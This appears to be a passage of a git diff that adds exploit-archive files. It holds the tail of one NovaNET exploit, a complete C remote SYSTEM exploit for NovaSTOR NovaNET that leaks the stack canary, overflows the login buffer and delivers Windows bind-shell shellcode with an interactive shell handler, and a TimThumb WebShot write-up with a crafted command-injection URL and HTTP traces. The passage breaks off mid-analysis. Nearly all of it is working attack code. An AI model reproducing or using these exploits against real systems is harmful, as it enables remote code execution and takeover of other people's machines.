*d_name) +{ + char rbuf_pkt[NOVANET_PKT_SZ], *ptr; + int fd, n, rlen; + + fd = sockami (thost, NOVANET_TCP_PORT); + if (fd == -1) + { + fprintf (stderr, "novanet_own_process: sockami failed\n"); + exit (EXIT_FAILURE); + } + + printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT); + + memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ); + + printf ("** sending login packet..."); + if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ) + { + fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", + n, NOVANET_PKT_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + printf ("** reading fourth packet..."); + if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ) + { + fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n", + n, NOVANET_PKT_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + rlen = 0x138 + 1; + *(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ; + + printf ("** sending remaining %d-bytes packet...", rlen); + if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ) + { + fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", + n, NOVANET_HDR_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + printf ("** sending hammer packet..."); + + ptr = malloc (rlen * sizeof (char)); + memset (ptr, 0x41, rlen); + *(unsigned int *) &ptr[0x134] = NOVANET_POPRET; + memcpy (&ptr[0], lnx_x86_bind, sizeof lnx_x86_bind - 1); + ptr[rlen - 1] = '\0'; + + if ((n = sock_send (fd, ptr, rlen)) != rlen) + { + fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", + n, rlen); + exit (EXIT_FAILURE); + } + + free (ptr); + printf ("done\n\n"); + + usleep (USLEEP_TIME); + close (fd); + + printf ("* waiting for the shellcode to be executed...\n"); + sleep (2); + + if ((fd = sockami (thost, PORT_SHELL)) != -1) + { + printf ("+Wh00t!\n\n"); + shellami (fd); + } +} + +int +main (int argc, char **argv) +{ + char d_name[NOVANET_DOMAIN_SZ]; + + 
printf ("NovaSTOR NovaNET <= 12.0 remote root exploit\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); + + if (argc < 2) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + exit (EXIT_SUCCESS); + } + + novanet_get_domain (argv[1], d_name); + novanet_own_process (argv[1], d_name); + + return (EXIT_SUCCESS); +} diff --git a/platforms/multiple/remote/33878.c b/platforms/multiple/remote/33878.c new file mode 100755 index 000000000..54b3288d9 --- /dev/null +++ b/platforms/multiple/remote/33878.c 
@@ -0,0 +1,651 @@ +source: http://www.securityfocus.com/bid/39693/info + +NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities. + +An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer. + +NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability. + +/* novanet-own.c + * + * Copyright (c) 2007 by + * + * NovaSTOR NovaNET <= 12.0 remote SYSTEM exploit + * by mu-b - Tue Sep 25 2007 + * + * - Tested on: NovaSTOR NovaNET 11.0 + * + * A remote buffer overflow in the login protocol allows arbitrary + * code execution as SYSTEM, however, the vulnerable function is + * contained in a DLL (nnwindtb.dll) compiled with /gs. + * + * Thus we exploit another vulnerability to remotely read arbitrary + * memory and retrieve the stack canary from nnwindtb.dll @ 0x016A6784. + * + * Note: this was silently fixed in NovaBACKUP NETWORK 13.0 + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! 
+ */ + +#include +#include + +#include +#include +#include +#include +#include + +#define HAS_NULL(a) (((a) - 0x01010101) & ~(a) & 0x80808080) +#define CANARY_VAL(a,b) (a ^ b) + +/* offset defines */ +#define NTDLL_ESP 0x7C86A01B + +/* thread info defines */ +#define NOVANET_THREAD_NAME "Sup: Work to Do" + +#define NOVANET_TEB_BLKS 2 +static struct { + void *teb_start; + int teb_num; +} teb_addrs[2] = { { (void *) 0x7FFDF000, 11 }, + { (void *) 0x7FFB0000, 5 } }; + +#define WIN32_TEB_SZ 0x1000 + +/* packet structure defines */ +#define NOVANET_HDR_SZ 0x14 +#define NOVANET_PKT_SZ 0x92 +#define NOVANET_DOMAIN_SZ 0x1F +#define NOVANET_BUF_SZ 0x400 + +/* memory read defines */ +#define NOVANET_READ_SZ sizeof (void *) +#define NOVANET_INT_IDX 32 +#define NOVANET_OFFSET 0x100EC480 +#define NOVANET_CALC_INT(a) (((int) (a)-NOVANET_OFFSET-16)/sizeof (int)) +#define NOVANET_SET_INT(a,b) *((unsigned int *) &a[NOVANET_INT_IDX]) = b; + +#define PORT_SHELL 10000 +#define NOVANET_TCP_PORT 3817 +#define USLEEP_TIME 100000 + +static char getdomain_buf[] = + "\x54\x84\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x92\x00\x00\x00" + "\xff\xff\xff\xff\x08\x40\x80\x00\x16\xaa\x11\x02\x4c\x84\xf4\x01" + "\x01\x00\x00\x00\xc0\xa8\x01\xbc\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00" "digit-labs!$" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00" "Sup: Get Domain Address" + "\x00\x00\xff\xff\x00\x00\x06\x10"; + +static char ack_buf[] = + "\x51\x84\x00\x00\x00\x00\x00\x30" + "\x05\x00\x00\x00" + "\x18\x00\x00\x00" /* remaining length */ + "\x00\x00\x00\x00" + "\x01\x00\x00\x00"; + +static char hup_buf[] = + "\x56\x84\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x14\x00\x00\x00" /* remaining length */ + "\x00\x00\x00\x00"; + +static char login_buf[] = + 
"\x54\x84\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x92\x00\x00\x00" + "\xff\xff\xff\xff\x09\x20\x80\x00\xcb\x14\x4C\x02\x41\xda\x2e\x02" + "\x01\x00\x00\x00\xc0\xa8\x01\xbc\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69" + "\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69" + "\x69\x69\x69" "Dtb: Context" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\xff\xff\x00\x00\x06\x10"; + +static char rem_buf[] = + "\x51\x84\x00\x00\x02\x02\x02\x32" + "\x18\x00\x00\x00" + "\x00\x00\x00\x00" /* remaining length */ + "\x00\x00\x00\x00"; + +static char win32_x86_bind[] = + "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8e" + "\x2b\xb7\x2a\x83\xeb\xfc\xe2\xf4\x72\x41\x5c\x67\x66\xd2\x48\xd5" + "\x71\x4b\x3c\x46\xaa\x0f\x3c\x6f\xb2\xa0\xcb\x2f\xf6\x2a\x58\xa1" + "\xc1\x33\x3c\x75\xae\x2a\x5c\x63\x05\x1f\x3c\x2b\x60\x1a\x77\xb3" + "\x22\xaf\x77\x5e\x89\xea\x7d\x27\x8f\xe9\x5c\xde\xb5\x7f\x93\x02" + "\xfb\xce\x3c\x75\xaa\x2a\x5c\x4c\x05\x27\xfc\xa1\xd1\x37\xb6\xc1" + "\x8d\x07\x3c\xa3\xe2\x0f\xab\x4b\x4d\x1a\x6c\x4e\x05\x68\x87\xa1" + "\xce\x27\x3c\x5a\x92\x86\x3c\x6a\x86\x75\xdf\xa4\xc0\x25\x5b\x7a" + "\x71\xfd\xd1\x79\xe8\x43\x84\x18\xe6\x5c\xc4\x18\xd1\x7f\x48\xfa" + "\xe6\xe0\x5a\xd6\xb5\x7b\x48\xfc\xd1\xa2\x52\x4c\x0f\xc6\xbf\x28" + "\xdb\x41\xb5\xd5\x5e\x43\x6e\x23\x7b\x86\xe0\xd5\x58\x78\xe4\x79" + "\xdd\x78\xf4\x79\xcd\x78\x48\xfa\xe8\x43\x90\x3a\xe8\x78\x3e\xcb" + "\x1b\x43\x13\x30\xfe\xec\xe0\xd5\x58\x41\xa7\x7b\xdb\xd4\x67\x42" + "\x2a\x86\x99\xc3\xd9\xd4\x61\x79\xdb\xd4\x67\x42\x6b\x62\x31\x63" + "\xd9\xd4\x61\x7a\xda\x7f\xe2\xd5\x5e\xb8\xdf\xcd\xf7\xed\xce\x7d" + "\x71\xfd\xe2\xd5\x5e\x4d\xdd\x4e\xe8\x43\xd4\x47\x07\xce\xdd\x7a" + "\xd7\x02\x7b\xa3\x69\x41\xf3\xa3\x6c\x1a\x77\xd9\x24\xd5\xf5\x07" + 
"\x70\x69\x9b\xb9\x03\x51\x8f\x81\x25\x80\xdf\x58\x70\x98\xa1\xd5" + "\xfb\x6f\x48\xfc\xd5\x7c\xe5\x7b\xdf\x7a\xdd\x2b\xdf\x7a\xe2\x7b" + "\x71\xfb\xdf\x87\x57\x2e\x79\x79\x71\xfd\xdd\xd5\x71\x1c\x48\xfa" + "\x05\x7c\x4b\xa9\x4a\x4f\x48\xfc\xdc\xd4\x67\x42\x61\xe5\x57\x4a" + "\xdd\xd4\x61\xd5\x5e\x2b\xb7\x2a"; + +static int +sock_send (int fd, char *src, int len) +{ + int n; + if ((n = send (fd, src, len, 0)) < 0) + { + fprintf (stderr, "sock_send: send() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + + return (n); +} + +static int +sock_recv (int fd, char *dst, int len) +{ + int n; + if ((n = recv (fd, dst, len, 0)) < 0) + { + fprintf (stderr, "sock_recv: recv() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + + return (n); +} + +static void +shellami (int fd) +{ + int n; + fd_set rset; + char rbuf[1024]; + + while (1) + { + FD_ZERO (&rset); + FD_SET (fd, &rset); + FD_SET (STDIN_FILENO, &rset); + + if (select (fd + 1, &rset, NULL, NULL, NULL) < 0) + { + fprintf (stderr, "shellami: select() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + + if (FD_ISSET (fd, &rset)) + { + if ((n = sock_recv (fd, rbuf, sizeof (rbuf) - 1)) <= 0) + { + fprintf (stderr, "shellami: connection closed by foreign host.\n"); + exit (EXIT_SUCCESS); + } + rbuf[n] = '\0'; + printf ("%s", rbuf); + fflush (stdout); + } + if (FD_ISSET (STDIN_FILENO, &rset)) + { + if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0) + { + rbuf[n] = '\0'; + sock_send (fd, rbuf, n); + } + } + } +} + +static int +sockami (char *host, int port) +{ + struct sockaddr_in address; + struct hostent *hp; + int fd; + + if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1) + { + fprintf (stderr, "sockami: socket() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + + if ((hp = gethostbyname (host)) == NULL) + { + fprintf (stderr, "sockami: gethostbyname() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + + memset (&address, 0, sizeof (address)); + memcpy ((char *) &address.sin_addr, 
hp->h_addr, hp->h_length); + address.sin_family = AF_INET; + address.sin_port = htons (port); + + if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0) + { + fprintf (stderr, "sockami: connect() - %s\n", strerror (errno)); + return (-1); + } + + return (fd); +} + +static void +novanet_read_pkt_init (char *pkt) +{ + char *ptr = pkt; + + /* add packet header */ + *ptr++ = 0x54; + *ptr++ = 0x84; + + /* add padding */ + memset (ptr, 0x00, 0x1E); + ptr += 0x1E; + + /* add our dodgy-int */ + memset (ptr, 0x69, sizeof (int)); + ptr += sizeof (int); + + memset (ptr, 0x00, NOVANET_PKT_SZ-(ptr-pkt)); +} + +static int +novanet_read (char *host, void *start, void *dst) +{ + fd_set r_fds; + struct timeval tv; + int fd, n; + char buf[NOVANET_PKT_SZ], rbuf[NOVANET_PKT_SZ]; + + novanet_read_pkt_init (buf); + start = (void *) NOVANET_CALC_INT (start); + + fd = sockami (host, NOVANET_TCP_PORT); + if (fd == -1) + { + fprintf (stderr, "novanet_read: sockami failed\n"); + exit (EXIT_FAILURE); + } + + NOVANET_SET_INT (buf, (unsigned int) start); + if ((n = sock_send (fd, buf, sizeof buf)) != NOVANET_PKT_SZ) + { + fprintf (stderr, "novanet_read: sock_send returned %d (!= %d)\n", + n, NOVANET_PKT_SZ); + return (0); + } + + FD_ZERO (&r_fds); + FD_SET (fd, &r_fds); + tv.tv_sec = 4; /* wait 4 seconds */ + tv.tv_usec = 0; + + n = select (fd + 1, &r_fds, NULL, NULL, &tv); + if (n == -1) + { + fprintf (stderr, "novanet_read: select() - %s\n", strerror (errno)); + exit (EXIT_FAILURE); + } + else if (n) + { + if ((n = sock_recv (fd, rbuf, sizeof rbuf)) != NOVANET_PKT_SZ) + { + fprintf (stderr, "novanet_read: sock_recv returned %d (!= %d)\n", + n, NOVANET_PKT_SZ); + return (0); + } + } + else + { + fprintf (stderr, "novanet_read: select timeout, we may have crashed NovaNET :(\n"); + exit (EXIT_FAILURE); + } + + memcpy (dst, &rbuf[NOVANET_INT_IDX], sizeof (void *)); + usleep (USLEEP_TIME); + close (fd); + + return (1); +} + +static void +novanet_read_str (char *host, void *start, 
char *dst, int dst_len) +{ + char r_val[NOVANET_READ_SZ], *ptr; + void *r_addr; + int nbytes; + + nbytes = 0; + ptr = dst; + r_addr = start; + + do + { + if (novanet_read (host, r_addr, &r_val) == 0) + break; + + strncpy (ptr, r_val, 4); + if (HAS_NULL (*(int *) r_val)) + break; + + ptr += 4; + r_addr += 4; + nbytes += 4; + } + while (nbytes < dst_len - 5); +} + +static int +novanet_map_process (char *host, int *esp_val) +{ + void *r_addr, *teb_addr, *thr_list, *arg_addr; + int i, j, num_threads, thr_count; + char r_buf[NOVANET_BUF_SZ]; + + r_addr = (void *) 0x10133C60 + 0x12510; + if (novanet_read (host, r_addr, &thr_count) == 0) + return (-1); + + printf ("** [nnwinsup.dll @ 0x10133C60+0x12510] thread list used: 0x%08X\n", + thr_count); + + num_threads = 0; + r_addr = (void *) 0x10133C60 + 0xB938; + if (novanet_read (host, r_addr, &thr_list) == 0) + return (-1); + + printf ("*** [nnwinsup.dll @ 0x10133C60+0x0B938] head ptr: 0x%08X\n", (int) thr_list); + + arg_addr = NULL; + while ((r_addr = thr_list)) + { + if (novanet_read (host, r_addr, &thr_list) == 0) + return (-1); + + novanet_read_str (host, r_addr + 0xE8, r_buf, sizeof r_buf); + + printf ("*** [nnwinsup.dll @ 0x%08X] next ptr: 0x%08X, name: \"%s\"\n", + (int) r_addr, (int) thr_list, r_buf); + + if (strcmp (r_buf, NOVANET_THREAD_NAME) == 0) + arg_addr = r_addr; + + if (thr_list != NULL) + num_threads++; + } + + printf ("** [nnwinsup.dll @ 0x10133C60+0x0B938] thread count: %d\n", num_threads); + + if (arg_addr == NULL) + return (-1); + + for (i = 0; i < NOVANET_TEB_BLKS; i++) + { + teb_addr = teb_addrs[i].teb_start - WIN32_TEB_SZ; + printf ("** [TEB BLK @ 0x%08X] scanning %d blocks\n", (int) teb_addr, teb_addrs[i].teb_num); + + for (j = 0; j < teb_addrs[i].teb_num; j++, teb_addr -= WIN32_TEB_SZ) + { + int st_addr, sb_addr, thr_id; + void *thr_arg; + + r_addr = teb_addr + 0x04; + if (novanet_read (host, r_addr, &st_addr) == 0) + break; + + r_addr = teb_addr + 0x08; + if (novanet_read (host, r_addr, &sb_addr) 
== 0) + break; + + r_addr = teb_addr + 0x24; + if (novanet_read (host, r_addr, &thr_id) == 0) + break; + + if (st_addr != 0xFFFFFFFF) + { + r_addr = (void *) st_addr - 0x7C; + + if (novanet_read (host, r_addr, &thr_arg) == 0) + break; + } + else + thr_arg = (void *) 0xDEADBEEF; + + printf ("** [TEB @ 0x%08X] thread id: %04X, stack base: 0x%08X, top: 0x%08X, arg: 0x%08X\n", + (int) teb_addr, thr_id, sb_addr, st_addr, (int) thr_arg); + + if (thr_arg == arg_addr) + { + printf ("** [TEB @ 0x%08X] found thread id: %04X, stack top: 0x%08X, ESP: 0x%08X\n", + (int) teb_addr, thr_id, st_addr, st_addr - 0x444); + *esp_val = st_addr - 0x444; + + return (0); + } + } + } + + return (-1); +} + +static void +novanet_get_domain (char *thost, char *d_name) +{ + char rbuf_hdr[NOVANET_HDR_SZ], rbuf_pkt[NOVANET_PKT_SZ], *pkt_ptr; + int fd, n, rlen; + + fd = sockami (thost, NOVANET_TCP_PORT); + if (fd == -1) + { + fprintf (stderr, "novanet_get_domain: sockami failed\n"); + exit (EXIT_FAILURE); + } + + printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT); + + printf ("** sending getdomain_buf packet..."); + if ((n = sock_send (fd, getdomain_buf, sizeof getdomain_buf - 1)) != NOVANET_PKT_SZ) + { + fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n", + n, NOVANET_PKT_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + printf ("** reading first reply..."); + if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ) + { + fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n", + n, NOVANET_PKT_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + memcpy (d_name, &rbuf_pkt[0x54], NOVANET_DOMAIN_SZ); + printf ("** remote domain address: %.*s\n", NOVANET_DOMAIN_SZ, d_name); + + printf ("** sending ack packet..."); + if ((n = sock_send (fd, ack_buf, sizeof ack_buf - 1)) != NOVANET_HDR_SZ + 4) + { + fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n", + n, NOVANET_HDR_SZ + 4); + exit (EXIT_FAILURE); + } + printf 
("done\n"); + + printf ("** reading second reply..."); + if ((n = sock_recv (fd, rbuf_hdr, sizeof rbuf_hdr)) != NOVANET_HDR_SZ) + { + fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n", + n, NOVANET_HDR_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + rlen = *(unsigned int *) &rbuf_hdr[12]; + if (rlen < NOVANET_HDR_SZ) + { + fprintf (stderr, "novanet_get_domain: remaining length invalid (<%d)\n", + NOVANET_HDR_SZ); + exit (EXIT_FAILURE); + } + + rlen -= NOVANET_HDR_SZ; + printf ("** reading %d-remaining bytes...", rlen); + pkt_ptr = malloc (rlen * sizeof (char)); + + if ((n = sock_recv (fd, pkt_ptr, rlen)) != rlen) + { + fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n", + n, rlen); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + free (pkt_ptr); + + printf ("** sending hup packet..."); + if ((n = sock_send (fd, hup_buf, sizeof hup_buf - 1)) != NOVANET_HDR_SZ) + { + fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", + n, NOVANET_HDR_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n\n"); + + usleep (USLEEP_TIME); + close (fd); +} + +static void +novanet_own_process (char *thost, char *d_name, int esp_val) +{ + char rbuf_pkt[NOVANET_PKT_SZ], *ptr; + int canary_val, fd, n, rlen; + + if (novanet_read (thost, (void *) 0x016A6784, &canary_val) == 0) + { + fprintf (stderr, "novanet_own_process: reading canary failed\n"); + exit (EXIT_FAILURE); + } + + fd = sockami (thost, NOVANET_TCP_PORT); + if (fd == -1) + { + fprintf (stderr, "novanet_own_process: sockami failed\n"); + exit (EXIT_FAILURE); + } + + printf ("** [nnwindtb.dll @ 0x016A6784] stack canary: 0x%08X\n\n", (int) canary_val); + if (HAS_NULL (CANARY_VAL(canary_val, esp_val))) + { + fprintf (stderr, "novanet_own_process: canary value invalid :(\n"); + exit (EXIT_FAILURE); + } + + printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT); + + memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ); + + printf ("** sending login packet..."); + if 
((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ) + { + fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", + n, NOVANET_PKT_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + printf ("** reading fourth packet..."); + if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ) + { + fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n", + n, NOVANET_PKT_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + rlen = 0x10C + 64 + (sizeof win32_x86_bind - 1) + 1; + *(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ; + + printf ("** sending remaining %d-bytes packet...", rlen); + if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ) + { + fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", + n, NOVANET_HDR_SZ); + exit (EXIT_FAILURE); + } + printf ("done\n"); + + printf ("** sending hammer packet..."); + + ptr = malloc (rlen * sizeof (char)); + memset (ptr, 0x41, rlen); + *(unsigned int *) &ptr[0x104] = CANARY_VAL(canary_val, esp_val); + *(unsigned int *) &ptr[0x108] = NTDLL_ESP; + memcpy (&ptr[0x10C + 64], win32_x86_bind, sizeof win32_x86_bind - 1); + ptr[rlen - 1] = '\0'; + + if ((n = sock_send (fd, ptr, rlen)) != rlen) + { + fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", + n, rlen); + exit (EXIT_FAILURE); + } + + free (ptr); + printf ("done\n\n"); + + usleep (USLEEP_TIME); + close (fd); + + printf ("* waiting for the shellcode to be executed...\n"); + sleep (2); + + if ((fd = sockami (thost, PORT_SHELL)) != -1) + { + printf ("+Wh00t!\n\n"); + shellami (fd); + } +} + +int +main (int argc, char **argv) +{ + char d_name[NOVANET_DOMAIN_SZ]; + int esp_val; + + printf ("NovaSTOR NovaNET <= 12.0 remote SYSTEM exploit\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); + + if (argc < 2) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + exit (EXIT_SUCCESS); + } + + esp_val = 0xdeadbeef; + + printf ("* 
mapping remote process...\n");
+ if (novanet_map_process (argv[1], &esp_val) < 0)
+ {
+ fprintf (stderr, "novanet_map_process: unable to locate thread :(\n");
+ exit (EXIT_SUCCESS);
+ }
+ printf ("* done\n\n");
+
+ novanet_get_domain (argv[1], d_name);
+ novanet_own_process (argv[1], d_name, esp_val);
+
+ return (EXIT_SUCCESS);
+}
diff --git a/platforms/php/webapps/33851.txt b/platforms/php/webapps/33851.txt
new file mode 100755
index 000000000..25a3dd520
--- /dev/null
+++ b/platforms/php/webapps/33851.txt
@@ -0,0 +1,201 @@
+######################################################################
+# _ ___ _ _ ____ ____ _ _____
+# | | / _ \| \ | |/ ___|/ ___| / \|_ _|
+# | | | | | | \| | | _| | / _ \ | |
+# | |__| |_| | |\ | |_| | |___ / ___ \| |
+# |_____\___/|_| \_|\____|\____/_/ \_\_|
+#
+# Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day)
+# Affected website : a lot Wordpress Themes, Plugins, 3rd party components
+# Exploit Author : @u0x (Pichaya Morimoto)
+# Release dates : June 24, 2014
+#
+# Special Thanks to 2600 Thailand group
+# : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio
+# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
+#
+########################################################################
+
+[+] Description
+============================================================
+TimThumb is a small php script for cropping, zooming and resizing web
+images (jpg, png, gif). Perfect for use on blogs and other applications.
+Developed for use in the WordPress theme Mimbo Pro, and since used in many
+other WordPress themes.
+
+http://www.binarymoon.co.uk/projects/timthumb/
+https://code.google.com/p/timthumb/
+
+The original project WordThumb 1.07 also vulnerable (
+https://code.google.com/p/wordthumb/)
+They both shared exactly the same WebShot code! And there are several
+projects that shipped with "timthumb.php", such as,
+Wordpress Gallery Plugin
+https://wordpress.org/plugins/wordpress-gallery-plugin/
+IGIT Posts Slider Widget
+http://wordpress.org/plugins/igit-posts-slider-widget/
+
+All themes from http://themify.me/ contains vulnerable "wordthumb" in
+"/themify/img.php".
+
+[+] Exploit
+============================================================
+http://
+/wp-content/themes//path/to/timthumb.php?webshot=1&src=http://
+$()
+
+** Note that OS commands payload MUST be within following character sets:
+[A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]
+
+** Spaces, Pipe, GT sign are not allowed.
+** This WebShot feature is DISABLED by default.
+** CutyCapt and XVFB must be installed in constants.
+
+[+] Proof-of-Concept
+============================================================
+There are couple techniques that can be used to bypass limited charsets but
+I will use a shell variable $IFS insteads of space in this scenario.
+
+PoC Environment:
+Ubuntu 14.04 LTS
+PHP 5.5.9
+Wordpress 3.9.1
+Themify Parallax Theme 1.5.2
+WordThumb 1.07
+
+Crafted Exploit:
+http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat)
+
+GET /wp-content/themes/parallax/themify/img.php?webshot=1&src=
+http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1
+Host: longcatlab.local
+Proxy-Connection: keep-alive
+Cache-Control: max-age=0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
+Gecko) Chrome/35.0.1916.153 Safari/537.36
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: en-US,en;q=0.8
+Cookie: woocommerce_recently_viewed=9%7C12%7C16;
+wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce;
+wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot;
+wordpress_test_cookie=WP+Cookie+check;
+wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685
+
+HTTP/1.1 400 Bad Request
+Date: Tue, 24 Jun 2014 07:20:48 GMT
+Server: Apache
+X-Powered-By: PHP/5.5.9-1ubuntu4
+X-Content-Type-Options: nosniff
+X-Frame-Options: sameorigin
+Content-Length: 3059
+Connection: close
+Content-Type: text/html
+
+…
+getimagesize
+( )../img.php:388
+
+

A WordThumb error has occured

The following error(s) occured:
  • The image being resized is not a valid gif, jpg or +png.


Query String : webshot=1&src= +http://longcatlab.local/$(touch$IFS/tmp/longcat)
WordThumb version :
+1.07
+
+Even it response with error messages but injected OS command has already
+been executed.
+
+$ ls /tmp/longcat -lha
+- -rw-r--r-- 1 www-data www-data 0 ??.?. 24 14:20 /tmp/longcat
+
+
+[+] Vulnerability Analysis
+============================================================
+https://timthumb.googlecode.com/svn/trunk/timthumb.php
+
+Filename: timthumb.php
+
+if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true);
+if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT',
+'/usr/local/bin/CutyCapt');
+if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run');
+...
+timthumb::start(); ? start script
+...
+public static function start(){
+$tim = new timthumb(); ? create timthumb object, call __construct()
+...
+$tim->run();
+...
+public function __construct(){
+...
+$this->src = $this->param('src'); ? set "src" variable to HTTP GET "src"
+parameter
+…
+if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){
+...
+$this->isURL = true; ? prefix http/s result in isURL = true
+}
+...
+
+protected function param($property, $default = ''){
+if (isset ($_GET[$property])) {
+return $_GET[$property];
+...
+
+public function run(){
+if($this->isURL){
+...
+if($this->param('webshot')){ ? HTTP GET "webshot" must submitted
+if(WEBSHOT_ENABLED){ ? this pre-defined constant must be true
+...
+$this->serveWebshot(); ? call webshot feature
+} else {
+...
+
+protected function serveWebshot(){
+...
+if(! is_file(WEBSHOT_CUTYCAPT)){ ? check existing of cutycapt
+return $this->error("CutyCapt is not installed. $instr");
+}
+if(! is_file(WEBSHOT_XVFB)){ ? check existing of xvfb
+return $this->Error("Xvfb is not installed. $instr");
+}
+...
+$url = $this->src;
+if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ? check valid
+URL #LoL
+return $this->error("Invalid URL supplied.");
+}
+$url =
+preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/',
+'', $url); ? check valid URL as specified in RFC 3986
+http://www.ietf.org/rfc/rfc3986.txt
+...
+if(WEBSHOT_XVFB_RUNNING){
+putenv('DISPLAY=:100.0');
+$command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\"
+--javascript=$jsOn --java=$javaOn --plugins=$pluginsOn
+--js-can-open-windows=off --url=\"$url\" --out-format=$format
+--out=$tempfile"; ? OS shell command injection
+} else {
+$command = "$xv --server-args=\"-screen 0,
+{$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout
